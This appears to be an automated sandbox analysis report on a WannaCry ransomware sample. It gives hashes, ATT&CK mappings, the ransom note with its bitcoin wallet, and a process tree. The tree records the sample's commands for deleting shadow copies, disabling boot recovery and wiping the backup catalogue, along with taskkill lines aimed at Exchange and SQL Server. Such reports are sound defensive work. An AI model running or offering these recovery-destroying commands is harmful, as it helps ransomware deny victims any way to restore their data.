wannacry | be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
11-06-2024 08:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WannaCry.exe
Size

224KB
MD5

5c7fb0927db37372da25f270708103a2
SHA1

120ed9279d85cbfa56e5b7779ffa7162074f7a29
SHA256

be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844
SHA512

a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206
SSDEEP

3072:Y059femWRwTs/dbelj0X8/j84pcRXPlU3Upt3or4H84lK8PtpLzLsR/EfcZ:+5RwTs/dSXj84mRXPemxdBlPvLzLeZ

Score

10^/10

wannacry defense_evasion execution impact persistence ransomware spyware stealer worm

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\!Please Read Me!.txt

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1 Next, please find the decrypt software on your desktop, an executable file named "!WannaDecryptor!.exe". If it does not exsit, download the software from the address below. (You may need to disable your antivirus for a while.) rar password: wcry123 Run and follow the instructions! �

Wallets

15zGqZCTcys6eCjDkE3DypCjXi6QWRV6V1

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Drops startup file 2 IoCs

Processes:

WannaCry.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD686C.tmp	WannaCry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD6883.tmp	WannaCry.exe

Executes dropped EXE 5 IoCs

Processes:

!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe

pid process

4844 !WannaDecryptor!.exe
3784 !WannaDecryptor!.exe
2916 !WannaDecryptor!.exe
3100 !WannaDecryptor!.exe
4512 !WannaDecryptor!.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

WannaCry.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Microsoft Update Task Scheduler = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\WannaCry.exe\" /r"	WannaCry.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

!WannaDecryptor!.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4018855536-2201274732-320770143-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\!WannaCryptor!.bmp"	!WannaDecryptor!.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

msedge.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Kills process with taskkill 4 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

2084 taskkill.exe
2416 taskkill.exe
4160 taskkill.exe
4520 taskkill.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

msedge.exemsedge.exeidentity_helper.exe

pid process

700 msedge.exe
700 msedge.exe
3952 msedge.exe
3952 msedge.exe
5112 identity_helper.exe
5112 identity_helper.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

!WannaDecryptor!.exe

pid process

3100 !WannaDecryptor!.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

msedge.exe

pid process

3952 msedge.exe
3952 msedge.exe
3952 msedge.exe

pid	process
2084	taskkill.exe
2416	taskkill.exe
4160	taskkill.exe
4520	taskkill.exe

pid	process
700	msedge.exe
700	msedge.exe
3952	msedge.exe
3952	msedge.exe
5112	identity_helper.exe
5112	identity_helper.exe

pid	process
3100	!WannaDecryptor!.exe

Suspicious use of AdjustPrivilegeToken 54 IoCs

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exeWMIC.exevssvc.exesvchost.exeSystemSettingsAdminFlows.exeSystemSettingsAdminFlows.exe

description	pid	process
Token: SeDebugPrivilege	2416	taskkill.exe
Token: SeDebugPrivilege	4520	taskkill.exe
Token: SeDebugPrivilege	2084	taskkill.exe
Token: SeDebugPrivilege	4160	taskkill.exe
Token: SeIncreaseQuotaPrivilege	4228	WMIC.exe
Token: SeSecurityPrivilege	4228	WMIC.exe
Token: SeTakeOwnershipPrivilege	4228	WMIC.exe
Token: SeLoadDriverPrivilege	4228	WMIC.exe
Token: SeSystemProfilePrivilege	4228	WMIC.exe
Token: SeSystemtimePrivilege	4228	WMIC.exe
Token: SeProfSingleProcessPrivilege	4228	WMIC.exe
Token: SeIncBasePriorityPrivilege	4228	WMIC.exe
Token: SeCreatePagefilePrivilege	4228	WMIC.exe
Token: SeBackupPrivilege	4228	WMIC.exe
Token: SeRestorePrivilege	4228	WMIC.exe
Token: SeShutdownPrivilege	4228	WMIC.exe
Token: SeDebugPrivilege	4228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4228	WMIC.exe
Token: SeRemoteShutdownPrivilege	4228	WMIC.exe
Token: SeUndockPrivilege	4228	WMIC.exe
Token: SeManageVolumePrivilege	4228	WMIC.exe
Token: 33	4228	WMIC.exe
Token: 34	4228	WMIC.exe
Token: 35	4228	WMIC.exe
Token: 36	4228	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4228	WMIC.exe
Token: SeSecurityPrivilege	4228	WMIC.exe
Token: SeTakeOwnershipPrivilege	4228	WMIC.exe
Token: SeLoadDriverPrivilege	4228	WMIC.exe
Token: SeSystemProfilePrivilege	4228	WMIC.exe
Token: SeSystemtimePrivilege	4228	WMIC.exe
Token: SeProfSingleProcessPrivilege	4228	WMIC.exe
Token: SeIncBasePriorityPrivilege	4228	WMIC.exe
Token: SeCreatePagefilePrivilege	4228	WMIC.exe
Token: SeBackupPrivilege	4228	WMIC.exe
Token: SeRestorePrivilege	4228	WMIC.exe
Token: SeShutdownPrivilege	4228	WMIC.exe
Token: SeDebugPrivilege	4228	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4228	WMIC.exe
Token: SeRemoteShutdownPrivilege	4228	WMIC.exe
Token: SeUndockPrivilege	4228	WMIC.exe
Token: SeManageVolumePrivilege	4228	WMIC.exe
Token: 33	4228	WMIC.exe
Token: 34	4228	WMIC.exe
Token: 35	4228	WMIC.exe
Token: 36	4228	WMIC.exe
Token: SeBackupPrivilege	1880	vssvc.exe
Token: SeRestorePrivilege	1880	vssvc.exe
Token: SeAuditPrivilege	1880	vssvc.exe
Token: SeManageVolumePrivilege	4672	svchost.exe
Token: SeSystemtimePrivilege	716	SystemSettingsAdminFlows.exe
Token: SeSystemtimePrivilege	716	SystemSettingsAdminFlows.exe
Token: SeSystemtimePrivilege	3252	SystemSettingsAdminFlows.exe
Token: SeSystemtimePrivilege	3252	SystemSettingsAdminFlows.exe

Suspicious use of FindShellTrayWindow 26 IoCs

Processes:

msedge.exe

pid	process
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe
3952	msedge.exe

Suspicious use of SetWindowsHookEx 11 IoCs

Processes:

!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exe!WannaDecryptor!.exeSystemSettingsAdminFlows.exeSystemSettingsAdminFlows.exe!WannaDecryptor!.exe

pid	process
4844	!WannaDecryptor!.exe
4844	!WannaDecryptor!.exe
3784	!WannaDecryptor!.exe
3784	!WannaDecryptor!.exe
2916	!WannaDecryptor!.exe
2916	!WannaDecryptor!.exe
3100	!WannaDecryptor!.exe
3100	!WannaDecryptor!.exe
716	SystemSettingsAdminFlows.exe
3252	SystemSettingsAdminFlows.exe
4512	!WannaDecryptor!.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WannaCry.execmd.execmd.exe!WannaDecryptor!.execmd.exe!WannaDecryptor!.exemsedge.exe

description	pid	process	target process
PID 1728 wrote to memory of 4860	1728	WannaCry.exe	cmd.exe
PID 1728 wrote to memory of 4860	1728	WannaCry.exe	cmd.exe
PID 1728 wrote to memory of 4860	1728	WannaCry.exe	cmd.exe
PID 4860 wrote to memory of 4228	4860	cmd.exe	cscript.exe
PID 4860 wrote to memory of 4228	4860	cmd.exe	cscript.exe
PID 4860 wrote to memory of 4228	4860	cmd.exe	cscript.exe
PID 1728 wrote to memory of 4844	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 4844	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 4844	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 2084	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 2084	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 2084	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 2416	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 2416	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 2416	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 4160	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 4160	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 4160	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 4520	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 4520	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 4520	1728	WannaCry.exe	taskkill.exe
PID 1728 wrote to memory of 3784	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 3784	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 3784	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 2136	1728	WannaCry.exe	cmd.exe
PID 1728 wrote to memory of 2136	1728	WannaCry.exe	cmd.exe
PID 1728 wrote to memory of 2136	1728	WannaCry.exe	cmd.exe
PID 2136 wrote to memory of 2916	2136	cmd.exe	!WannaDecryptor!.exe
PID 2136 wrote to memory of 2916	2136	cmd.exe	!WannaDecryptor!.exe
PID 2136 wrote to memory of 2916	2136	cmd.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 3100	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 3100	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 1728 wrote to memory of 3100	1728	WannaCry.exe	!WannaDecryptor!.exe
PID 2916 wrote to memory of 3628	2916	!WannaDecryptor!.exe	cmd.exe
PID 2916 wrote to memory of 3628	2916	!WannaDecryptor!.exe	cmd.exe
PID 2916 wrote to memory of 3628	2916	!WannaDecryptor!.exe	cmd.exe
PID 3628 wrote to memory of 4228	3628	cmd.exe	WMIC.exe
PID 3628 wrote to memory of 4228	3628	cmd.exe	WMIC.exe
PID 3628 wrote to memory of 4228	3628	cmd.exe	WMIC.exe
PID 3100 wrote to memory of 3952	3100	!WannaDecryptor!.exe	msedge.exe
PID 3100 wrote to memory of 3952	3100	!WannaDecryptor!.exe	msedge.exe
PID 3952 wrote to memory of 2384	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 2384	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe
PID 3952 wrote to memory of 3936	3952	msedge.exe	msedge.exe

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\WannaCry.exe
"C:\Users\Admin\AppData\Local\Temp\WannaCry.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 312351718094787.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:4860

C:\Windows\SysWOW64\cscript.exe
cscript //nologo c.vbs
3⤵
PID:4228

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
!WannaDecryptor!.exe f
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4844

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im MSExchange*
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2084

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im Microsoft.Exchange.*
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlserver.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4160

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im sqlwriter.exe
2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4520

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
!WannaDecryptor!.exe c
2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3784

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /b !WannaDecryptor!.exe v
2⤵
- Suspicious use of WriteProcessMemory
PID:2136

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
!WannaDecryptor!.exe v
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2916

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
4⤵
- Suspicious use of WriteProcessMemory
PID:3628

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4228

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
!WannaDecryptor!.exe
2⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.google.com/search?q=how+to+buy+bitcoin
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ff95e8346f8,0x7ff95e834708,0x7ff95e834718
4⤵
PID:2384

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2164 /prefetch:2
4⤵
PID:3936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2216 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:700

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2720 /prefetch:8
4⤵
PID:4952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
4⤵
PID:2240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
4⤵
PID:1996

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4896 /prefetch:1
4⤵
PID:1916

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
4⤵
PID:5104

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,12432901833464833444,14427384234694392302,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1832

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3184

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4672

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetDateTime
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:716

C:\Windows\System32\Upfc.exe
C:\Windows\System32\Upfc.exe /launchtype periodic /cv rkRoZkIwW0yCns87Kk4oDw.0
1⤵
PID:1264

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" SetDateTime
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3252

C:\Windows\System32\Upfc.exe
C:\Windows\System32\Upfc.exe /launchtype periodic /cv R6598ftMH0qUL6T966e5eA.0
1⤵
PID:2564

C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe
"C:\Users\Admin\AppData\Local\Temp\!WannaDecryptor!.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4512

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
ea98e583ad99df195d29aa066204ab56

SHA1
f89398664af0179641aa0138b337097b617cb2db

SHA256
a7abb51435909fa2d75c6f2ff5c69a93d4a0ab276ed579e7d8733b2a63ffbee6

SHA512
e109be3466e653e5d310b3e402e1626298b09205d223722a82344dd78504f3c33e1e24e8402a02f38cd2c9c50d96a303ce4846bea5a583423937ab018cd5782f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
4f7152bc5a1a715ef481e37d1c791959

SHA1
c8a1ed674c62ae4f45519f90a8cc5a81eff3a6d7

SHA256
704dd4f98d8ca34ec421f23ba1891b178c23c14b3301e4655efc5c02d356c2bc

SHA512
2e6b02ca35d76a655a17a5f3e9dbd8d7517c7dae24f0095c7350eb9e7bdf9e1256a7009aa8878f96c89d1ea4fe5323a41f72b8c551806dda62880d7ff231ff5c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000001

Filesize
202KB

MD5
6a16cbefd2e29c459297b7ccc8d366ad

SHA1
40da0213a9e5ea4cb6948f4a8e92b5e8b97e6cfe

SHA256
9462da5aa6e2a762b02a24b7305bac86349e5b5ea182d36fd6a163de550cde60

SHA512
6a9de0231f9987554a20208a89c6c802d28c57ecb6f9e95771c94156b65c61ac1e18298ce6d3f0559d3a08052845cc2014dab335e119fde731d745e4857b7d74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

Filesize
120B

MD5
9558b7e09be924c8e85354b916daf9ec

SHA1
af086b0b7e427aa2dd0dd3aa33c557132c1856bf

SHA256
3643a6ded78a06b4a0b378d1bdc038c816863b0566a623d64fb96ca2bafc7c10

SHA512
adaeca6bde67578dc99b591714fe9a755b1236e2f7b006bb583a2219b75337efa626abbd52b919b65ebc2f169b71691e55d749d1ec1b7ae6683d42ceec7de673

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
48B

MD5
15628a09a9daa7fd3f208b6df7ff574d

SHA1
cfae8083fabecc6fa2c9149fd6748b3885c664c0

SHA256
49194703d26675a9755d566686fc25800e0054dceef4c98ce57fde618f5fbd76

SHA512
d8a69d2b6e1e1cd173d7d6cac163bb246ce923893fa01a83166f847fa6528cd85ed63f1bde9edc18def4af23bd9ff0ade0539cdc3fbeb4d7967a47836df0c543

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
845B

MD5
d63068a07d7de7e8bff4150d3bc284ef

SHA1
117b07b0ee7d3063384bd0d77e2b938356ad5ba7

SHA256
d54d39a245aeac4a6d4a55ebb8d135a9b422d9fb6cbd6a299f51ed22d4b24129

SHA512
acc261015b9fdc4f9070f6e6c6ccb0a331296b52f175f9756f5ffa156a5196ed482924f4787c5aa9d803c8d8b3e7f769748fcaea17f0dbafb9d25c08fb10fe38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
a84680c2c26da96209ac54c6f610162d

SHA1
2d4e749689013e9c90aeca35415400c0f60d64ac

SHA256
ad33df4db4fc55e1736120f352c63e63706305861f4211baadb813024d1add10

SHA512
980a270031329f3fa0366ef9a0897ea6c8e60ad6c38d4d45bc5ffc7c0b6a8617ed7f48f0930259cee027fd396e04975c178f96ca58310d1fd03605bbdb174ed4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
daf6e0fd7037d6ec1b19619dbd88093d

SHA1
311e497f388d6f2f73efe1e101c803bf71fb14c3

SHA256
4d423fa1a90f3301c85877e447a89d8549b2bf9277d29044d5d1f13083163cad

SHA512
3ea50e8ad5b7d7d29c8f29f4e4dc9aca28f1c08be49cbb0bfb260a0bc661fddb472f96d4e0d56aadc980761db3d37f935154da31a6358b24bf37d5f55288434a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
a8d458389245b911b10b05dfe3a5ddee

SHA1
ef3293a1cf16a442bfd609ad682d36da4343f746

SHA256
046fbaffff458759acf816db027b9b847dd02dec20423d4a90646e94996020d2

SHA512
65417ac1969eaccb5fe80c8798740f960f14057b16351f9727bc880f81597c718e7f4a3795b4ca79fa390c8cdf12410fe9dc1fd0fe00d075242504a06a741f2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
